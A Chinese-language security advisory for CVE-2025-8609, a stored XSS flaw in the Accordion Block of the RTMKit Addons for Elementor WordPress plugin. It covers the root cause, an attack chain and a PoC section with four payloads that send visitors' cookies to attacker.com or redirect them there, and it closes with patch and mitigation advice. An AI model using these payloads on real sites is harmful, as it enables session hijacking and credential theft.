CVE-2025-8609 | RTMKit Addons for Elementor 插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8609

漏洞类型

存储型跨站脚本攻击 (Stored XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

RTMKit Addons for Elementor (rometheme-for-elementor) WordPress插件

漏洞概述

RTMKit Addons for Elementor是WordPress平台上广受欢迎的Elementor页面构建器扩展插件。2025年11月披露的安全漏洞显示，该插件1.6.1及之前所有版本中存在严重的存储型跨站脚本(XSS)安全缺陷。该漏洞位于插件的Accordion Block(手风琴折叠块)组件中，由于对用户提供的属性值缺乏充分的输入清理和输出转义处理，导致恶意JavaScript代码可被永久存储在受影响页面中。攻击者仅需具备贡献者(Contributor)级别或更高权限即可利用此漏洞。一旦恶意脚本被注入，任何访问含恶意代码页面的用户都会在不知情的情况下执行攻击者植入的脚本，可能导致会话劫持、敏感信息窃取、管理后台凭证泄露等严重后果。鉴于该插件在WordPress生态中的广泛使用，建议所有用户立即检查并更新到最新安全版本。

技术细节

漏洞根源在于RTMKit Addons for Elementor插件的rkit_image_accordion.php文件(第1032行附近)对手风琴块用户输入属性的处理机制。当用户在Elementor编辑器中配置Accordion Block组件时，插件直接接收并存储用户提供的属性参数，但未对其进行适当的HTML实体转义或输入验证。攻击者可通过构造包含JavaScript事件处理器(如onerror、onload、onclick等)的恶意payload，例如在标题或内容属性中注入<script>alert(document.cookie)</script>或<img src=x onerror=恶意代码>等payload。保存页面后，该恶意脚本会以HTML形式永久存储在数据库中。当其他用户访问包含该手风琴块的页面时，浏览器会将其作为可信内容解析执行，从而触发XSS攻击。攻击者可利用此漏洞窃取管理员Cookie、篡改页面内容、重定向用户至钓鱼站点或执行其他恶意操作。由于攻击发生在已认证用户的上下文中，可绕过部分CSRF防护机制。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用RTMKit Addons for Elementor插件(版本≤1.6.1)，并确认存在可利用的Accordion Block组件

STEP 2

账户获取

攻击者获取WordPress Contributor级别或更高权限账户(可通过社会工程、凭证填充或内部人员协助等方式)

STEP 3

Payload构造

攻击者构造包含恶意JavaScript的XSS payload，如<img src=x onerror=fetch(...)>或<script>标签

STEP 4

漏洞注入

通过Elementor编辑器在Accordion Block的标题或内容属性中注入恶意Payload并发布页面

STEP 5

持久化存储

恶意脚本随页面内容永久存储在WordPress数据库中，无需攻击者再次操作

STEP 6

触发执行

受害者访问包含恶意手风琴块的页面时，浏览器解析并执行注入的JavaScript代码

STEP 7

数据窃取/恶意操作

攻击者通过执行的脚本窃取Cookie、会话令牌，或进行页面篡改、钓鱼跳转等恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-8609 PoC - Stored XSS in RTMKit Addons for Elementor Accordion Block -->
<!-- Attack requires Contributor-level access or higher in WordPress -->

<!-- Method 1: Using img tag with onerror event -->
<img src=x onerror="fetch('https://attacker.com/log?cookie='+document.cookie)">

<!-- Method 2: Using SVG element -->
<svg/onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))>

<!-- Method 3: Using script tag -->
<script>new Image().src='https://attacker.com/log?c='+document.cookie;</script>

<!-- Method 4: Using body onload event -->
<body onload="document.location='https://attacker.com/redirect?url='+window.location.href">

<!-- Exploitation Steps: -->
<!-- 1. Login to WordPress with Contributor+ account -->
<!-- 2. Create/edit a page with Elementor -->
<!-- 3. Add RTMKit Accordion Block widget -->
<!-- 4. Inject XSS payload in Accordion title or content fields -->
<!-- 5. Publish/update the page -->
<!-- 6. Any user visiting the page will execute the malicious script -->

影响范围

RTMKit Addons for Elementor (rometheme-for-elementor) ≤ 1.6.1

防御指南

临时缓解措施

立即将RTMKit Addons for Elementor插件升级到1.6.2或更高版本。如暂时无法升级，可暂时禁用插件的Accordion Block功能，或使用WordPress安全插件添加临时防护规则。同时审查所有具有Contributor及以上权限的账户，移除不必要的账户，并对管理员账户启用双因素认证以降低账户被盗用风险。